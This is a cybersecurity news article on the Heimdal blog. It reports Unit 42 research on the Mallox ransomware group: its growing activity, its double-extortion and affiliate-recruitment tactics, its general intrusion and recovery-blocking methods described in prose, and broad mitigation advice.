Heimdal
article featured image

Contents:

The Mallox ransomware group, also known as TargetCompany, Fargo, and Tohnichi, has become increasingly active, signaling a significant shift in its operations. According to recent findings, Mallox’s ransomware activities in 2023 have seen a staggering 174% increase compared to the previous year.

Researchers` Findings

Security researchers from Palo Alto Networks Unit 42, reported that Mallox, like other ransomware actors, is adopting the double extortion tactic. They steal sensitive data from breached organizations before encrypting their files and then threaten to leak the stolen data on a leak site to coerce victims into paying the ransom.

This ransomware group is linked to a broader threat actor associated with various ransomware strains, including TargetCompany, Tohnichi, Fargo, and Xollam.

attacks increase

Source

Characteristics

One noteworthy characteristic of Mallox is its modus operandi of exploiting poorly secured MS-SQL servers through dictionary attacks. These vulnerable servers act as a penetration vector to infiltrate victims’ networks. However, researchers have also observed Mallox deviating from this norm by using malicious OneNote file attachments for initial access.

Furthermore, once Mallox gains a foothold on the compromised host, it executes a PowerShell command to retrieve the ransomware payload from a remote server. The binary then takes measures to hinder recovery efforts by stopping and removing SQL-related services, deleting volume shadow copies, clearing system event logs, and terminating security-related processes. After encrypting the victim’s data, Mallox drops a ransom note in every directory.

ransom note

Source

Despite being a relatively small and closed group in the past, Mallox has been actively recruiting affiliates for its ransomware-as-a-service (RaaS) program, which might explain the recent surge in its activities.

Further Context and Mitigations

The sudden escalation in Mallox infections is part of a broader trend in the ransomware landscape. Ransomware attacks, in general, have surged by 221% year-over-year as of June 2023, with a total of 434 attacks reported in June 2023 alone, largely driven by the Clop ransomware group’s exploitation of the MOVEit file transfer software vulnerability.

The researchers warned that the heightened activity of the Mallox ransomware group, coupled with the recruitment efforts, could lead to more attacks on organizations if successful.

To defend against such threats, organizations are advised to ensure the proper configuration of internet-facing applications, keep all systems patched and up to date, and implement endpoint security controls for detecting suspicious activities. Being proactive in cybersecurity measures remains the best defense against ransomware threats like Mallox.

You can find the full, comprehensive, article on How to Mitigate Ransomware, here.

If you liked this article, follow us on LinkedInTwitterFacebook, and YouTube for more cybersecurity news and topics.

Author Profile

Mihaela Popa

COMMUNICATIONS & PR OFFICER

Mihaela is a digital content creator for Heimdal® and the proud owner of an old soul and a curious mind. Passionate to learn and discover more about cybersecurity, she will gladly share her latest finds with you.

CHECK OUR SUITE OF 11 CYBERSECURITY SOLUTIONS

SEE MORE